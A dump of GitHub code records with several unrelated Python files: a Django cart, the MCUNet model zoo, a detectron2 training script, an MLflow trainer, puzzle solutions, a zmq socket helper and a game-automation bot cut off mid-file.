سلة التسوق\n def __len__(self):\n #باستخدام سم وياتي بهم جميعا من الكارت qty هذا يقوم بجمع القيم من \n return sum(item['qty'] for item in self.cart.values())\n \n\n# ----------------------------------------\n\n def __iter__(self):\n\n # لجلب جميع مفاتيح المنتجات الموجودة في سلة التسوق\n all_product_ids = self.cart.keys()\n\n # استرداد جميع المنتجات اللتي تحمل المفاتيح السابقة \n products = Product.objects.filter(id__in=all_product_ids)\n \n # يتم نسخ محتوي سلة التسوق الي مصفوفة\n cart = self.cart.copy()\n\n # لعمل تكرار بالمنتجات المفلترة اللتي اتينا بها\n for product in products:\n \n # لعمل مفتاح بالاسم لاستخدامه لاحقا في العرض وهو به المنتجات\n cart[str(product.id)]['product'] = product\n\n # لكل عنصر في مجموعة كرات فعل الامور التالية\n for item in cart.values():\n\n # لتحويل كل عنصر اتينا به الي رقم حسابي وهذا للتعامل معه جيدا في العمليات الرياضية\n item['price'] = Decimal(item['price'])\n\n # total ضرب قيمة السعر الاجمالي في كل عنصر في الكمية وهذا ياتي بالسعر الكلي داخل المتغير \n item['total'] = item['price'] * item['qty']\n\n # لاعادة العنصر الحالي من سلة التسوق بشكل تدريجي وهذا لتوفير الذاكرة والاداء\n yield item\n\n\n # -----------------------------------\n\n def get_total(self):\n \n # لجلب الاسعار وضربها في الكمية للحصول علي السعر الكلي لجميع المنتجات بكمياتهم\n return sum(Decimal(item['price']) * item['qty'] for item in self.cart.values())","repo_name":"AhmedRagep/E-Commerce-Advanced-Django","sub_path":"cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34475583687","text":"import json\nimport torch\n\nfrom .tinynas.nn.networks import ProxylessNASNets\nfrom .utils import download_url\n\n__all__ = ['net_id_list', 'build_model', 'download_tflite']\n\n\"\"\" Note: all the memory and latency profiling is done with TinyEngine \"\"\"\nNET_INFO = {\n ##### imagenet models ######\n # mcunet models\n 'mcunet-in0': {\n 'net_name': 'mcunet-10fps_imagenet',\n 'description': 'MCUNet model that runs 10fps on STM32F746 (ImageNet)'\n },\n 'mcunet-in1': {\n 'net_name': 'mcunet-5fps_imagenet',\n 'description': 'MCUNet model that runs 5fps on STM32F746 (ImageNet)'\n },\n 'mcunet-in2': {\n 'net_name': 'mcunet-256kb-1mb_imagenet',\n 'description': 'MCUNet model that fits 256KB SRAM and 1MB Flash (ImageNet)',\n },\n 'mcunet-in3': {\n 'net_name': 'mcunet-320kb-1mb_imagenet',\n 'description': 'MCUNet model that fits 320KB SRAM and 1MB Flash (ImageNet)',\n },\n 'mcunet-in4': {\n 'net_name': 'mcunet-512kb-2mb_imagenet',\n 'description': 'MCUNet model that fits 512KB SRAM and 2MB Flash (ImageNet)',\n },\n # baseline models\n 'mbv2-w0.35': {\n 'net_name': 'mbv2-w0.35-r144_imagenet',\n 'description': 'scaled MobileNetV2 that fits 320KB SRAM and 1MB Flash (ImageNet)',\n },\n 'proxyless-w0.3': {\n 'net_name': 'proxyless-w0.3-r176_imagenet',\n 'description': 'scaled ProxylessNet that fits 320KB SRAM and 1MB Flash (ImageNet)'\n },\n\n ##### vww models ######\n 'mcunet-vww0': {\n 'net_name': 'mcunet-10fps_vww',\n 'description': 'MCUNet model that runs 10fps on STM32F746 (VWW)'\n },\n 'mcunet-vww1': {\n 'net_name': 'mcunet-5fps_vww',\n 'description': 'MCUNet model that runs 5fps on STM32F746 (VWW)'\n },\n 'mcunet-vww2': {\n 'net_name': 'mcunet-320kb-1mb_vww',\n 'description': 'MCUNet model that fits 320KB SRAM and 1MB Flash (VWW)'\n },\n\n ##### detection demo model ######\n # NOTE: we have tf-lite only for this model\n 'person-det': {\n 'net_name': 'person-det',\n 
'description': 'person detection model used in our demo'\n },\n}\n\nnet_id_list = list(NET_INFO.keys())\n\nurl_base = \"https://hanlab18.mit.edu/projects/tinyml/mcunet/release/\"\n\n\ndef build_model(net_id, pretrained=True):\n assert net_id in NET_INFO, 'Invalid net_id! Select one from {})'.format(list(NET_INFO.keys()))\n net_info = NET_INFO[net_id]\n\n net_config_url = url_base + net_info['net_name'] + \".json\"\n sd_url = url_base + net_info['net_name'] + \".pth\"\n\n net_config = json.load(open(download_url(net_config_url)))\n resolution = net_config['resolution']\n model = ProxylessNASNets.build_from_config(net_config)\n\n if pretrained:\n sd = torch.load(download_url(sd_url), map_location='cpu')\n model.load_state_dict(sd['state_dict'])\n return model, resolution, net_info['description']\n\n\ndef download_tflite(net_id):\n assert net_id in NET_INFO, 'Invalid net_id! Select one from {})'.format(list(NET_INFO.keys()))\n net_info = NET_INFO[net_id]\n tflite_url = url_base + net_info['net_name'] + \".tflite\"\n return download_url(tflite_url) # the file path of the downloaded tflite model\n","repo_name":"mit-han-lab/mcunet","sub_path":"mcunet/model_zoo.py","file_name":"model_zoo.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":330,"dataset":"github-code","pt":"21"} +{"seq_id":"21746613982","text":"from typing import List, Tuple\n\nfrom petools.tools.estimate_tools import Human\n\n\nclass OpWrapper:\n \"\"\"\n This object performs a given Op on input humans. Each human will be provided with an individual Op instance.\n When instantiating an Op for a given human, it is being bind to the human's id (and saved to an internal register\n of ops) so that the Op instance can be reused when a human with the same id is encountered.\n \"\"\"\n def __init__(self, op_init_fn):\n \"\"\"\n Parameters\n ----------\n op_init_fn : func\n Function that create class which apply some operation on list of Human classes\n Class must have method with next signature:\n def __call__(self, human: Human) -> Human:\n pass\n Class must return list of modified (or whatever) list of Human classes\n\n \"\"\"\n self.op_init_fn = op_init_fn\n self.register = {}\n\n def __call__(self, humans: List[Human], **op_kwargs) -> List[Tuple[Human, object]]:\n \"\"\"\n Returns results of the given Op applied to `humans`.\n\n Parameters\n ----------\n humans : List[Human]\n List of humans to be processed.\n op_kwargs : dict\n Supplement key-word arguments for the Op instances.\n\n Returns\n -------\n List[Tuple[Human, object]]\n A list of tuples (Human, operation result).\n \"\"\"\n op_results = []\n for human in humans:\n if human.id == -1:\n # An exceptional case which is not being processed by the OpWrapper.\n # Humans with id=-1 are assumed to be erroneous.\n op_results.append((human, None))\n continue\n op = self.register.get(str(human.id))\n if op is None:\n # Human with a new id has been encountered. 
Create a new instance of the Op\n op = self.op_init_fn()\n self.register[str(human.id)] = op\n op_result = op(human, **op_kwargs)\n op_results.append((human, op_result))\n return op_results\n","repo_name":"MakiResearchTeam/PETools","sub_path":"petools/model_tools/operation_wrapper/op_wrapper.py","file_name":"op_wrapper.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7781957799","text":"#引入以下注释\nfrom detectron2.data import DatasetCatalog, MetadataCatalog\nfrom detectron2.data.datasets.coco import load_coco_json\nimport pycocotools\nimport os\nimport logging\nimport os\nfrom collections import OrderedDict\nimport torch\nimport cv2\nimport detectron2.utils.comm as comm\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import get_cfg\nfrom detectron2.data import MetadataCatalog\nfrom detectron2.utils.visualizer import Visualizer\nfrom detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, hooks, launch\nfrom detectron2.evaluation import (\n CityscapesInstanceEvaluator,\n CityscapesSemSegEvaluator,\n COCOEvaluator,\n COCOPanopticEvaluator,\n DatasetEvaluators,\n LVISEvaluator,\n PascalVOCDetectionEvaluator,\n SemSegEvaluator,\n verify_results,\n)\nfrom detectron2.modeling import GeneralizedRCNNWithTTA\n\n#声明类别,尽量保持\nCLASS_NAMES =[\"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\",\n \"cow\", \"diningtable\", \"dog\", \"horse\",\n \"motorbike\", \"person\", \"pottedplant\",\n \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\n# 数据集路径\nDATASET_ROOT = 'D:/mycode/py-workspace/DL/detectron2/detectron2/data/datasets/coco_data'\nANN_ROOT = os.path.join(DATASET_ROOT, 'annotations')\n\nTRAIN_PATH = os.path.join(DATASET_ROOT, 'train2017')\nVAL_PATH = os.path.join(DATASET_ROOT, 'val2017')\n\nTRAIN_JSON = os.path.join(ANN_ROOT, 'instances_train2017.json')\n#VAL_JSON = os.path.join(ANN_ROOT, 'val.json')\nVAL_JSON = os.path.join(ANN_ROOT, 'instances_val2017.json')\n\n# 声明数据集的子集\nPREDEFINED_SPLITS_DATASET = {\n \"coco_2017_train\": (TRAIN_PATH, TRAIN_JSON),\n \"coco_2017_val\": (VAL_PATH, VAL_JSON),\n}\n#===========以下有两种注册数据集的方法,本人直接用的第二个plain_register_dataset的方式 也可以用register_dataset的形式==================\n#注册数据集(这一步就是将自定义数据集注册进Detectron2)\ndef register_dataset():\n \"\"\"\n purpose: register all splits of dataset with PREDEFINED_SPLITS_DATASET\n \"\"\"\n for key, (image_root, json_file) in PREDEFINED_SPLITS_DATASET.items():\n register_dataset_instances(name=key,\n json_file=json_file,\n image_root=image_root)\n\n\n#注册数据集实例,加载数据集中的对象实例\ndef register_dataset_instances(name, json_file, image_root):\n \"\"\"\n purpose: register dataset to DatasetCatalog,\n register metadata to MetadataCatalog and set attribute\n \"\"\"\n DatasetCatalog.register(name, lambda: load_coco_json(json_file, image_root, name))\n MetadataCatalog.get(name).set(json_file=json_file,\n image_root=image_root,\n evaluator_type=\"coco\")\n\n#=============================\n# 注册数据集和元数据\ndef plain_register_dataset():\n #训练集\n DatasetCatalog.register(\"coco_2017_train\", lambda: load_coco_json(TRAIN_JSON, TRAIN_PATH))\n MetadataCatalog.get(\"coco_2017_train\").set(thing_classes=CLASS_NAMES, # 可以选择开启,但是不能显示中文,这里需要注意,中文的话最好关闭\n evaluator_type='coco', # 指定评估方式\n json_file=TRAIN_JSON,\n image_root=TRAIN_PATH)\n\n #DatasetCatalog.register(\"coco_my_val\", lambda: load_coco_json(VAL_JSON, VAL_PATH, \"coco_2017_val\"))\n #验证/测试集\n 
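# Editor's note (comment added here): the comment above, 验证/测试集, means validation/test set.\n # Registration mirrors the training split: DatasetCatalog is given a loader lambda, then\n # MetadataCatalog is given the class names, evaluator type and paths for the same dataset name.\n 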
DatasetCatalog.register(\"coco_2017_val\", lambda: load_coco_json(VAL_JSON, VAL_PATH))\n MetadataCatalog.get(\"coco_2017_val\").set(thing_classes=CLASS_NAMES, # 可以选择开启,但是不能显示中文,这里需要注意,中文的话最好关闭\n evaluator_type='coco', # 指定评估方式\n json_file=VAL_JSON,\n image_root=VAL_PATH)\n# 查看数据集标注,可视化检查数据集标注是否正确,\n#这个也可以自己写脚本判断,其实就是判断标注框是否超越图像边界\n#可选择使用此方法\ndef checkout_dataset_annotation(name=\"coco_2017_val\"):\n #dataset_dicts = load_coco_json(TRAIN_JSON, TRAIN_PATH, name)\n dataset_dicts = load_coco_json(TRAIN_JSON, TRAIN_PATH)\n print(len(dataset_dicts))\n for i, d in enumerate(dataset_dicts,0):\n #print(d)\n img = cv2.imread(d[\"file_name\"])\n visualizer = Visualizer(img[:, :, ::-1], metadata=MetadataCatalog.get(name), scale=1.5)\n vis = visualizer.draw_dataset_dict(d)\n #cv2.imshow('show', vis.get_image()[:, :, ::-1])\n cv2.imwrite('out/'+str(i) + '.jpg',vis.get_image()[:, :, ::-1])\n #cv2.waitKey(0)\n if i == 200:\n break\n\n\nclass Trainer(DefaultTrainer):\n \"\"\"\n We use the \"DefaultTrainer\" which contains pre-defined default logic for\n standard training workflow. They may not work for you, especially if you\n are working on a new research project. In that case you can write your\n own training loop. You can use \"tools/plain_train_net.py\" as an example.\n \"\"\"\n\n @classmethod\n def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n \"\"\"\n Create evaluator(s) for a given dataset.\n This uses the special metadata \"evaluator_type\" associated with each builtin dataset.\n For your own dataset, you can simply create an evaluator manually in your\n script and do not have to worry about the hacky if-else logic here.\n \"\"\"\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n evaluator_list = []\n evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type\n if evaluator_type in [\"sem_seg\", \"coco_panoptic_seg\"]:\n evaluator_list.append(\n SemSegEvaluator(\n dataset_name,\n distributed=True,\n num_classes=cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,\n ignore_label=cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,\n output_dir=output_folder,\n )\n )\n if evaluator_type in [\"coco\", \"coco_panoptic_seg\"]:\n evaluator_list.append(COCOEvaluator(dataset_name, cfg, True, output_folder))\n if evaluator_type == \"coco_panoptic_seg\":\n evaluator_list.append(COCOPanopticEvaluator(dataset_name, output_folder))\n if evaluator_type == \"cityscapes_instance\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesInstanceEvaluator(dataset_name)\n if evaluator_type == \"cityscapes_sem_seg\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesSemSegEvaluator(dataset_name)\n elif evaluator_type == \"pascal_voc\":\n return PascalVOCDetectionEvaluator(dataset_name)\n elif evaluator_type == \"lvis\":\n return LVISEvaluator(dataset_name, cfg, True, output_folder)\n if len(evaluator_list) == 0:\n raise NotImplementedError(\n \"no Evaluator for the dataset {} with the type {}\".format(\n dataset_name, evaluator_type\n )\n )\n elif len(evaluator_list) == 1:\n return evaluator_list[0]\n return DatasetEvaluators(evaluator_list)\n\n @classmethod\n def test_with_TTA(cls, cfg, model):\n logger = logging.getLogger(\"detectron2.trainer\")\n # In the end of training, run an evaluation with TTA\n # Only support some R-CNN models.\n logger.info(\"Running inference with test-time 
augmentation ...\")\n model = GeneralizedRCNNWithTTA(cfg, model)\n evaluators = [\n cls.build_evaluator(\n cfg, name, output_folder=os.path.join(cfg.OUTPUT_DIR, \"inference_TTA\")\n )\n for name in cfg.DATASETS.TEST\n ]\n res = cls.test(cfg, model, evaluators)\n res = OrderedDict({k + \"_TTA\": v for k, v in res.items()})\n return res\n\ndef setup(args):\n \"\"\"\n Create configs and perform basic setups.\n \"\"\"\n cfg = get_cfg()\n args.config_file = \"../configs/Misc/cascade_mask_rcnn_R_50_FPN_3x.yaml\"\n cfg.merge_from_file(args.config_file) # 从config file 覆盖配置\n cfg.merge_from_list(args.opts) # 从CLI参数 覆盖配置\n\n # 更改配置参数\n cfg.DATASETS.TRAIN = (\"coco_2017_train\",) # 训练数据集名称\n cfg.DATASETS.TEST = (\"coco_2017_val\",)\n cfg.DATALOADER.NUM_WORKERS = 2 # 单线程\n\n '''\n cfg.INPUT.CROP.ENABLED = True\n cfg.INPUT.MAX_SIZE_TRAIN = 640 # 训练图片输入的最大尺寸\n cfg.INPUT.MAX_SIZE_TEST = 640 # 测试数据输入的最大尺寸\n cfg.INPUT.MIN_SIZE_TRAIN = (512, 768) # 训练图片输入的最小尺寸,可以设定为多尺度训练\n cfg.INPUT.MIN_SIZE_TEST = 640\n #cfg.INPUT.MIN_SIZE_TRAIN_SAMPLING,其存在两种配置,分别为 choice 与 range :\n # range 让图像的短边从 512-768随机选择\n #choice : 把输入图像转化为指定的,有限的几种图片大小进行训练,即短边只能为 512或者768\n cfg.INPUT.MIN_SIZE_TRAIN_SAMPLING = 'range'\n '''\n# 本句一定要看下注释!!!!!!!!\n # cfg.MODEL.RETINANET.NUM_CLASSES = 21 # 类别数+1(因为有background,也就是你的 cate id 从 1 开始,如果您的数据集Json下标从 0 开始,这个改为您对应的类别就行,不用再加背景类!!!!!)\n cfg.MODEL.ROI_HEADS.NUM_CLASSES = 20\n #cfg.MODEL.WEIGHTS=\"/home/yourstorePath/.pth\"\n cfg.MODEL.WEIGHTS = \"../model_final_480dd8.pkl\" # 预训练模型权重\n #cfg.MODEL.WEIGHTS = \"output/model_0002248.pth\" #测试时使用的模型,看自己训练结果的outputs\n cfg.SOLVER.IMS_PER_BATCH = 1 # batch_size=2; iters_in_one_epoch = dataset_imgs/batch_size\n\n cfg.SOLVER.BASE_LR = 0.002\n cfg.SOLVER.MAX_ITER = (\n 1000\n )\n cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = (\n 1\n )\n\n\n\n # 根据训练数据总数目以及batch_size,计算出每个epoch需要的迭代次数\n #9000为你的训练数据的总数目,可自定义\n ITERS_IN_ONE_EPOCH = int(5717 / cfg.SOLVER.IMS_PER_BATCH)\n\n '''\n # 指定最大迭代次数\n cfg.SOLVER.MAX_ITER = (ITERS_IN_ONE_EPOCH * 12) - 1 # 12 epochs,\n # 初始学习率\n cfg.SOLVER.BASE_LR = 0.002\n\n cfg.SOLVER.MAX_ITER = (\n 100\n )\n cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = (\n 1\n )\n\n # 优化器动能\n cfg.SOLVER.MOMENTUM = 0.9\n #权重衰减\n cfg.SOLVER.WEIGHT_DECAY = 0.0001\n cfg.SOLVER.WEIGHT_DECAY_NORM = 0.0\n # 学习率衰减倍数\n cfg.SOLVER.GAMMA = 0.1\n # 迭代到指定次数,学习率进行衰减\n cfg.SOLVER.STEPS = (800,)\n # 在训练之前,会做一个热身运动,学习率慢慢增加初始学习率\n cfg.SOLVER.WARMUP_FACTOR = 1.0 / 1000\n # 热身迭代次数\n cfg.SOLVER.WARMUP_ITERS = 100\n\n cfg.SOLVER.WARMUP_METHOD = \"linear\"\n \n # 保存模型文件的命名数据减1\n cfg.SOLVER.CHECKPOINT_PERIOD = ITERS_IN_ONE_EPOCH - 1\n\n '''\n # 迭代到指定次数,进行一次评估\n cfg.TEST.EVAL_PERIOD = ITERS_IN_ONE_EPOCH\n #cfg.TEST.EVAL_PERIOD = 100\n\n #cfg.merge_from_file(args.config_file)\n #cfg.merge_from_list(args.opts)\n cfg.freeze()\n default_setup(cfg, args)\n return cfg\n\ndef main(args):\n cfg = setup(args)\n\n if args.eval_only:\n model = Trainer.build_model(cfg)\n DetectionCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load(\n cfg.MODEL.WEIGHTS, resume=args.resume\n )\n res = Trainer.test(cfg, model)\n if cfg.TEST.AUG.ENABLED:\n res.update(Trainer.test_with_TTA(cfg, model))\n if comm.is_main_process():\n verify_results(cfg, res)\n return res\n\n \"\"\"\n If you'd like to do anything fancier than the standard training logic,\n consider writing your own training loop (see plain_train_net.py) or\n subclassing the trainer.\n \"\"\"\n os.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n trainer = Trainer(cfg)\n trainer.resume_or_load(resume=args.resume)\n if cfg.TEST.AUG.ENABLED:\n 
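# Editor's note (comment added here): an EvalHook with eval_period=0 fires only once, after the\n # final training iteration, so the test-time-augmentation evaluation runs at the end of training.\n 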
trainer.register_hooks(\n [hooks.EvalHook(0, lambda: trainer.test_with_TTA(cfg, trainer.model))]\n )\n return trainer.train()\n\n\nif __name__ == \"__main__\":\n args = default_argument_parser().parse_args()\n print(\"Command Line Args:\", args)\n launch(\n main,\n args.num_gpus,\n num_machines=args.num_machines,\n machine_rank=args.machine_rank,\n dist_url=args.dist_url,\n args=(args,),\n )\n\n\n","repo_name":"Scottyoung99/ASL-Detection","sub_path":"TargetDetection/TargetDetection/TargetModels/mask/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73003551092","text":"import numpy as np\nimport pandas as pd\nimport yaml\nimport mlflow\nfrom mlflow.models import infer_signature\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_squared_error\n\n\ndef train_model(\n features: pd.DataFrame, target: pd.Series, artifact_path: str, param: dict\n) -> mlflow.ActiveRun:\n \n # update model parameters\n with open(\"scripts/config/model_config.yml\", \"r\") as file:\n default_param = yaml.safe_load(file)\n model_param = {**default_param[\"random_forest\"], **param[\"model\"][\"param\"]}\n\n with mlflow.start_run() as run:\n # model creation\n model = get_power_forecaster(model_param)\n model.fit(X=features, y=target)\n predict = model.predict(features)\n rmse = compute_rmse(target.to_numpy(), predict)\n\n # model logging\n signature = infer_signature(features, predict)\n dataset = mlflow.data.from_pandas(\n features,\n source=param[\"input_data\"][\"location_path\"]\n )\n mlflow.log_input(dataset, context=\"training\")\n mlflow.log_params(model_param)\n mlflow.log_metric(\"rmse\", rmse)\n mlflow.sklearn.log_model(\n model, artifact_path=artifact_path, signature=signature\n )\n return run\n\n\ndef generate_features(df: pd.DataFrame) -> pd.DataFrame:\n return df[[\"cloudcover_low\", \"cloudcover_mid\", \"cloudcover_high\"]].assign(\n hour=lambda df: df.index.hour.astype(\"float\"),\n month=lambda df: df.index.month.astype(\"float\"),\n minutes=lambda df: 60.0 * df.index.hour + df.index.minute,\n day=lambda df: df.index.dayofyear.astype(\"float\"),\n )\n\n\ndef generate_target(df: pd.DataFrame) -> pd.Series | None:\n column_name = \"power\"\n if column_name in df.columns:\n return df[column_name]\n return None\n\n\ndef get_power_forecaster(param: dict) -> RandomForestRegressor:\n return RandomForestRegressor(**param)\n\n\ndef compute_rmse(y_true: np.array, y_pred: np.array) -> float:\n return np.sqrt(mean_squared_error(y_true, y_pred))\n","repo_name":"ahavrius/ml-pipeline","sub_path":"scripts/model_func.py","file_name":"model_func.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17904516652","text":"import numpy as np\nfrom fractions import gcd\n\ndef main():\n thres = 1000000\n low, high = 1800, 1850\n cond = getCentroid((low+high)/2) > thres\n auxcond = getCentroid((low+high)/2 -1) < thres\n\n while not (cond and auxcond):\n if cond:\n low = (low+high)/2\n else:\n high = (low+high)/2\n cond = getCentroid((low+high)/2) > thres\n auxcond = getCentroid((low+high)/2 -1) < thres\n print(\"The least value of M is: %d\") %(low+high)/2\n\ndef getCentroid(M):\n triples = genPrimitiveTriples(M, 2*M)\n \n count = 0\n for x in triples:\n K = min(M/x[0], 2*M/x[1])\n for k in xrange(1,K+1):\n a,b = k*x[0], k*x[1]\n #for i in xrange(1,a/2):\n 
# L,W,H = i,a-i,b\n # print (\"%d, %d, %d\") %(L,W,H)\n #if b/2>a:\n # for i in xrange(b/2, a+1):\n # L,W,H = b-i,i,a\n # print(\"%d, %d, %d\") %(L,W,H)\n if b <= M:\n num = a/2 if b/2>a else a/2 + b/2 - (b-a-1)\n else:\n num = 0 if b/2>a else b/2 - (b-a-1)\n count += num\n #print(\"[%d, %d, %d]: %d\") %(a,b,k*x[2],num)\n return count\n\n\ndef genPrimitiveTriples(A1,A2):\n \"\"\"Generate Pythagorean primitive triples using Euclid's formula:\n * a = m^2 - n^2\n * b = 2mn\n * c = m^2 + n^2\n Parameters\n ----------\n A1: int\n Maximum of shorter leg\n A2: int\n Maximum of longer leg\n \n Returns\n -------\n triples: list of tuples (int, int, int)\n All Pythagorean primitive triples\n \"\"\"\n triples = []\n M = A1 \n for m in xrange(2,M+1):\n for n in xrange(1,m):\n a,b,c = m*m-n*n, 2*m*n, m*m+n*n\n a,b = min(a,b), max(a,b)\n condition = min(a,b) < A1 and max(a,b) < A2\n if gcd(m,n)==1 and (m-n)%2 and condition:\n #print(\"[%d, %d]: (%d, %d, %d)\") %(m,n,m*m-n*n, 2*m*n, m*m+n*n)\n triples.append((a,b,c))\n return triples\n\n#thres = 1000000\n#low, high = 1800, 1850\n#cond = getCentroid((low+high)/2) > thres\n#auxcond = getCentroid((low+high)/2 -1) < thres\n#\n#while not (cond and auxcond):\n# if cond:\n# low = (low+high)/2\n# else:\n# high = (low+high)/2\n# cond = getCentroid((low+high)/2) > thres\n# auxcond = getCentroid((low+high)/2 -1) < thres\n#print(\"The least value of M is: %d\") % (low+high)/2\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kuol/Project_Euler","sub_path":"prob_086/prob_086.py","file_name":"prob_086.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10376105205","text":"def solution(ans):\n p = [[], [], []]\n while len(p[0]) < len(ans):\n for n in [1, 2, 3, 4, 5]:\n if len(p[0]) == len(ans):\n break\n p[0].append(n)\n for n in [2, 1, 2, 3, 2, 4, 2, 5]:\n if len(p[1]) == len(ans):\n break\n p[1].append(n)\n for n in [3, 3, 1, 1, 2, 2, 4, 4, 5, 5]:\n if len(p[2]) == len(ans):\n break\n p[2].append(n)\n \n scores = [0, 0, 0]\n for i in range(len(ans)):\n for j in range(3):\n if ans[i] == p[j][i]:\n scores[j] += 1\n \n answer = []\n max_score = max(scores)\n for i in range(len(scores)):\n if scores[i] == max_score:\n answer.append(i + 1)\n return answer","repo_name":"yejin7211/Algorithm","sub_path":"프로그래머스/lv1/42840. 모의고사/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37856537265","text":"from __future__ import absolute_import\n\nimport time\n\nfrom ..io import descriptor\nimport zmq.backend\n\n\n__all__ = [\"wait_socks\"]\n\n\ndef wait_socks(sock_events, inmask=1, outmask=2, timeout=None):\n \"\"\"wait on a combination of zeromq sockets, normal sockets, and fds\n\n .. 
note:: this method can block\n\n it will return once there is relevant activity on any of the\n descriptors or sockets, or the timeout expires\n\n :param sock_events:\n two-tuples, the first item is either a zeromq socket, a socket, or a\n file descriptor, and the second item is a mask made up of the inmask\n and/or the outmask bitwise-ORd together\n :type sock_events: list\n :param inmask: the mask to use for readable events (default 1)\n :type inmask: int\n :param outmask: the mask to use for writable events (default 2)\n :type outmask: int\n :param timeout: the maximum time to block before raising an exception\n :type timeout: int, float or None\n\n :returns:\n a list of two-tuples, each has one of the first elements from\n ``sock_events``, the second element is the event mask of the activity\n that was detected (made up on inmask and/or outmask bitwise-ORd\n together)\n \"\"\"\n results = []\n for sock, mask in sock_events:\n if isinstance(sock, zmq.backend.Socket):\n mask = _check_events(sock, mask, inmask, outmask)\n if mask:\n results.append((sock, mask))\n if results:\n return results\n\n fd_map = {}\n fd_events = []\n for sock, mask in sock_events:\n if isinstance(sock, zmq.backend.Socket):\n fd = sock.getsockopt(zmq.FD)\n elif isinstance(sock, int):\n fd = sock\n else:\n fd = sock.fileno()\n\n fd_map[fd] = sock\n fd_events.append((fd, mask))\n\n while 1:\n started = time.time()\n active = descriptor.wait_fds(fd_events, inmask, outmask, timeout)\n if not active:\n # timed out\n return []\n\n results = []\n for fd, mask in active:\n sock = fd_map[fd]\n if isinstance(sock, zmq.backend.Socket):\n mask = _check_events(sock, mask, inmask, outmask)\n if not mask:\n continue\n results.append((sock, mask))\n\n if results:\n return results\n\n timeout -= time.time() - started\n\n\ndef _check_events(sock, mask, inmask=1, outmask=2):\n evs = sock.getsockopt(zmq.EVENTS)\n result = 0\n if evs & zmq.POLLIN and mask & inmask:\n result |= inmask\n if evs & zmq.POLLOUT and mask & outmask:\n result |= outmask\n return result\n","repo_name":"teepark/greenhouse","sub_path":"greenhouse/ext/zmq.py","file_name":"zmq.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"21"} +{"seq_id":"24300666843","text":"from chronicles.chronicle_settings import ChronicleSettings\nfrom logic.abstract_bot import AbstractBot\n\nBUTTON_SIT = \"0\"\nBUTTON_DROP = \"3\"\nBUTTON_ATTACK = \"1\"\nBUTTON_NEAREST_TARGET = \"6\"\nBUTTON_HEAL_POTION = \"8\"\nBUTTON_SPOIL = \"2\"\nBUTTON_SWEEP = \"4\"\n\n\nclass DwarvenFighterBot(AbstractBot):\n\n def __init__(self, chronicle_settings: ChronicleSettings):\n super().__init__(chronicle_settings)\n self.__spoil_used = False\n\n def actions_before_main(self):\n if self.get_self_hp() < 40:\n print(\"INFO: We need to relax\")\n if self.sit_until_heal(BUTTON_SIT):\n return True\n else:\n self.attack_target(BUTTON_ATTACK)\n return False\n\n def main_actions(self):\n return self.set_target_and_attack(BUTTON_ATTACK, BUTTON_NEAREST_TARGET)\n\n def actions_after_main(self):\n self.get_drop(BUTTON_DROP)\n\n def fail_actions(self, fail_count: int):\n if fail_count >= 5:\n self.move_random_location() # COMMENT THIS STRING IF NOT NEED MOVE\n return True\n elif 1 < fail_count < 5:\n self.rotate_right()\n return False\n else:\n return False\n\n def actions_while_attack(self, target_hp: int, self_hp: int):\n if self_hp <= 20:\n self.use_skill(BUTTON_HEAL_POTION)\n if not self.__spoil_used and target_hp < 80:\n 
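# Editor's note (comment added here): Spoil is cast at most once per target, the first time its\n # HP drops below 80%; actions_on_target_death() casts Sweep and resets the flag for the next target.\n 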
